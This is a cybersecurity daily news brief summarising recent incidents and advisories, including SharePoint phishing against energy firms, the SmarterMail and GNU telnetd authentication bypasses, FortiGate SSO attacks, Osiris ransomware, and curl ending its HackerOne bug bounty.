Daily Brief

Cybercriminals targeted energy firms by compromising Microsoft SharePoint services to harvest credentials, resulting in unauthorized access to corporate inboxes and widespread phishing email distribution. Attackers used previously compromised email addresses to infiltrate multiple energy-sector organizations, exploiting SharePoint URLs disguised as legitimate proposals to deceive recipients. Once credentials were obtained, inbox rules were manipulated to delete incoming emails, facilitating the distribution of over 600 phishing emails from compromised accounts. The phishing campaign targeted contacts within and outside the organizations, leveraging recent email threads to enhance the authenticity of malicious communications. Attackers maintained control by monitoring inboxes, deleting responses, and potentially bypassing standard remediation measures through tampered multi-factor authentication settings. Microsoft advises implementing multi-factor authentication and conditional access policies to mitigate such threats, emphasizing the importance of identity-driven security measures. Organizations are encouraged to invest in anti-phishing solutions to preemptively scan emails and websites for potential threats, enhancing overall cybersecurity resilience.

The curl project will terminate its HackerOne bug bounty program by January 31, 2026, due to an influx of low-quality, AI-generated vulnerability reports. Daniel Stenberg, curl’s founder, cited the overwhelming number of invalid submissions as a key factor, straining the small team of maintainers. Curl, a widely used command-line utility, has been offering cash rewards for responsibly disclosed vulnerabilities since 2019 through HackerOne. The decision aims to reduce non-productive submissions and protect the mental health of curl's developers by removing financial incentives for poor-quality reports. Starting February 1, 2026, curl will transition to an internal submission process via GitHub, ceasing new HackerOne submissions. The shift reflects broader challenges in managing AI-generated content within open-source security programs, prompting a reevaluation of vulnerability reporting processes. Curl's updated security policy explicitly warns against submitting low-effort reports, with potential public ridicule for non-compliance.

An authentication bypass flaw in SmarterMail allows attackers to reset admin passwords, granting them full privileges on the system. The vulnerability is found in the force-reset-password API endpoint, which lacks authentication controls, enabling unauthorized access. After SmarterMail issued a patch on January 15, threat actors reverse-engineered it and began exploiting the flaw within two days. SmarterMail, used by MSPs and SMBs worldwide, has over 15 million users, heightening the potential impact of this security issue. Attackers with admin access can execute OS commands, leading to full remote code execution on vulnerable systems. Security researchers created a proof-of-concept exploit demonstrating SYSTEM-level shell access to highlight the severity of the flaw. Users are advised to upgrade to the latest SmarterMail version, Build 9511, to mitigate this vulnerability and the associated risks.

A new ransomware strain, Osiris, targeted a major food service franchisee in Southeast Asia in November 2025, using a BYOVD attack to disable security defenses. The attack utilized the POORTRY driver, specifically crafted to elevate privileges and terminate security tools, marking a shift from traditional BYOVD methods. Osiris employs a hybrid encryption scheme and can halt services, encrypt specific files, and drop ransom notes, demonstrating advanced capabilities. Attackers exfiltrated sensitive data to Wasabi cloud storage using Rclone before deploying the ransomware, indicating a sophisticated, multi-stage attack. The attackers leveraged dual-use tools such as Netscan and MeshAgent, and enabled RDP for remote access, showcasing a diverse toolkit. Potential links to previous INC ransomware activities were noted, suggesting experienced threat actors may be involved. Organizations are advised to monitor dual-use tools, restrict RDP access, enforce multi-factor authentication, and maintain off-site backups to mitigate such threats. The ransomware landscape continues to evolve, with a slight increase in attacks reported in 2025, highlighting the persistent threat to enterprises.

A critical vulnerability, CVE-2026-24061, in GNU InetUtils telnetd permits remote login bypass, affecting versions from 1.9.3 to 2.7, with a CVSS score of 9.8. The flaw enables attackers to gain root access by exploiting the USER environment variable, bypassing normal authentication processes on affected systems. The vulnerability was introduced in a code commit from March 2015 and was publicly disclosed by security researcher Carlos Cortes Alvarez in January 2026. Mitigation strategies include applying the latest patches and restricting telnet port access to trusted clients; disabling telnetd or using a custom login tool are suggested workarounds. GreyNoise intelligence detected 21 IP addresses attempting to exploit this vulnerability, with origins from multiple countries including the U.S., China, and Germany. Organizations should prioritize patching and network access controls to prevent exploitation of this critical flaw, which has been actively targeted globally.

Microsoft plans to introduce "Brand Impersonation Protection" in Teams, targeting social engineering threats from external callers posing as trusted entities. The feature will begin rolling out in mid-February, automatically activating for users, with no administrative setup required. Incoming VoIP calls from first-time external contacts will be scrutinized for brand impersonation, displaying high-risk warnings to users. Users can choose to accept, block, or end flagged calls, with alerts persisting if suspicious activity continues during the call. This initiative aims to reduce social engineering risks and improve security by alerting users to potential fraudulent calls. Microsoft advises IT departments to update training materials and prepare support staff for user inquiries regarding the new security feature. The addition is part of Microsoft's broader efforts to enhance caller identity protection and secure collaboration within Teams.

Cyber Centaurs uncovered an operational security flaw in the INC ransomware gang, leading to data recovery for 12 U.S. organizations across various sectors. The investigation began after a ransomware attack on a U.S. organization's SQL Server, revealing the use of a RainINC variant executed from the Windows PerfLogs directory. Researchers discovered artifacts from the Restic backup tool, indicating its selective use in the ransomware's operational toolkit, although not in the initial attack. Analysis shifted from incident response to infrastructure examination, revealing persistent attacker-controlled repositories storing encrypted victim data. A controlled enumeration process confirmed the presence of encrypted data from 12 unrelated organizations, which was subsequently decrypted and preserved. Cyber Centaurs collaborated with law enforcement to validate data ownership and ensure proper handling of recovered information. YARA and Sigma rules were developed to detect the use of Restic or its renamed binaries, aiding in early identification of potential ransomware activities. INC ransomware, a RaaS operation, has claimed several high-profile victims, emphasizing the ongoing threat posed by such criminal enterprises.

Arctic Wolf has identified automated attacks on FortiGate firewalls, exploiting compromised SSO accounts to alter settings and exfiltrate configuration files. Attackers sidestep SSO protections, create backdoor admin users, and export configurations containing sensitive credentials and network details. The intrusions are linked to two critical authentication bypass vulnerabilities, CVE-2025-59718 and CVE-2025-59719, initially patched in December. Despite patches, administrators report ongoing intrusions, suggesting a patch bypass for CVE-2025-59718; Fortinet is preparing additional updates. Affected customers have observed attacks originating from specific IP addresses, with logs showing unauthorized SSO logins and admin account creation. Arctic Wolf advises auditing admin accounts, reviewing configuration changes, rotating credentials, and monitoring SSO activity until new patches are available. Fortinet plans to release FortiOS updates 7.4.11, 7.6.6, and 8.0.0 to address the vulnerabilities fully.

The shift to hybrid work environments has significantly increased Active Directory password reset incidents, impacting employee productivity and IT helpdesk operations. Remote employees face frequent account lockouts due to outdated cached credentials and increased password rotation requirements, leading to more helpdesk tickets. Each password reset costs an estimated $70 in IT resources, with organizations processing hundreds annually, resulting in substantial financial burdens. The hidden costs of password resets include lost productivity, as employees wait for IT assistance, affecting overall business efficiency. Self-service password reset tools offer a solution, enabling employees to securely reset credentials without IT intervention, reducing downtime and operational costs. Organizations implementing self-service solutions report annual savings of approximately $65,000 on resets and an additional $48,000 on account unlocks. Effective self-service tools should integrate seamlessly with existing Active Directory infrastructure and address remote work-specific challenges, such as cached credential updates.

A spear-phishing campaign, Operation Nomad Leopard, is targeting Afghan government entities using decoy administrative documents to distribute the FALSECUB backdoor. Attackers leverage a GitHub-hosted ISO image file containing a LNK file and a PDF to execute the payload, indicating a low-to-moderate sophistication level. The campaign, detected in December 2025, has not been linked to any specific country or hacker group, suggesting a regionally focused threat actor. The backdoor, a C++ executable, receives commands from an external server, posing a significant threat to governmental operations and data security. Organizations are advised to strengthen email security protocols and conduct employee training to recognize phishing attempts. This incident demonstrates the persistent threat of spear-phishing campaigns and the need for continuous vigilance and enhanced cybersecurity measures.

European regulators issued over €1.2 billion in GDPR fines in 2025, reflecting increased enforcement activity and a rise in data breach notifications. Daily data breach reports in Europe averaged 443, marking a 22% increase from the previous year, the highest since GDPR's inception. The DLA Piper survey attributes the surge to geopolitical factors, frequent cyber incidents, and easily accessible attack tools. Organizations face challenges from new cybersecurity laws like NIS2 and DORA, raising disclosure requirements and imposing personal liability on management. Ireland leads GDPR enforcement, with €4.04 billion in fines since 2018, including a €530 million penalty against TikTok for data transfer violations. Big tech companies remain primary targets, with nine of the ten largest GDPR fines levied against them. The GDPR framework is stabilizing, with routine penalties and increased breach reporting, urging businesses to enhance cyber defenses and resilience.

The Bank of England's 2025 cybersecurity review identifies ongoing basic security gaps within financial organizations, despite extensive regulatory frameworks. Common issues include poor access controls, weak passwords, and misconfigured systems, posing significant risks to financial management infrastructures. Social engineering attacks, such as phishing, remain a critical threat due to inadequate staff training and awareness in security practices. The National Cyber Security Centre warns that groups like Scattered Spider exploit these vulnerabilities using phishing and spear-phishing tactics. CBEST assessments reveal that while improvements in multi-factor authentication are noted, many organizations still struggle with integrating cyber threat intelligence effectively. The report emphasizes the need for financial entities to enhance resilience against sophisticated and state-sponsored cyber threats. Despite recurring vulnerabilities, the financial sector shows varied maturity levels in managing cyber threat intelligence, indicating potential for improvement. The CBEST assessments aim to guide financial institutions in identifying and addressing prevalent security gaps to prevent damaging cyber incidents.

The Pwn2Own Automotive 2026 event in Tokyo awarded $439,250 to researchers for exploiting 29 zero-day vulnerabilities in automotive technologies. Researchers targeted fully patched systems, including EV chargers, in-vehicle infotainment systems, and car operating systems like Automotive Grade Linux. Fuzzware.io led the competition, earning $213,000 by exploiting vulnerabilities in EV charging controllers and multimedia receivers. Other participants, including Summoning Team and Technical Debt Collectors, demonstrated zero-day exploits on navigation receivers and charging stations. Over the first two days, participants earned $955,750 by exploiting 66 zero-day vulnerabilities, showcasing significant security gaps in automotive technologies. Vendors have a 90-day window to develop and release patches for these zero-day flaws before public disclosure by TrendMicro's Zero Day Initiative. The event underscores the critical need for robust security measures in the rapidly evolving automotive technology landscape.

A critical vulnerability in the GNU InetUtils telnet daemon (telnetd), tracked as CVE-2026-24061, allows attackers to gain root access, affecting systems using this outdated service. The flaw, present for nearly 11 years, was disclosed on January 20 and is rated with a severity score of 9.8, indicating a critical risk level. GreyNoise reported 15 unique IP addresses attempting to exploit this vulnerability within 24 hours of its disclosure, signaling active exploitation efforts. The vulnerability involves an argument injection flaw, allowing attackers to bypass authentication with a crafted USER environment variable, granting root access. Security experts recommend immediate patching and suggest migrating to more secure alternatives like SSH to mitigate potential risks. National cybersecurity agencies in France, Canada, and Belgium have issued advisories urging the decommissioning of telnet services due to inherent security risks. The incident serves as a reminder of the importance of regular system updates and the need to phase out legacy systems vulnerable to exploitation.

Arctic Wolf reports a new campaign targeting Fortinet FortiGate devices, exploiting an unknown vulnerability in the single sign-on feature to create rogue accounts and steal firewall configurations. The attacks began on January 15 and show similarities to previous incidents related to a critical authentication bypass vulnerability (CVE-2025-59718) in Fortinet products. Attackers exploit the vulnerability via malicious SAML messages, allowing them to bypass authentication on vulnerable FortiGate firewalls when FortiCloud SSO is enabled. Fortinet's latest FortiOS version (7.4.10) does not fully address the vulnerability, prompting plans for further updates (7.4.11, 7.6.6, and 8.0.0) to mitigate the issue. Administrators are advised to disable FortiCloud SSO temporarily to prevent unauthorized access until a comprehensive patch is released. Shadowserver is monitoring nearly 11,000 online Fortinet devices with FortiCloud SSO enabled, highlighting the potential scale of exposure. CISA has added CVE-2025-59718 to its catalog of known exploited vulnerabilities, mandating federal agencies to apply patches within a week.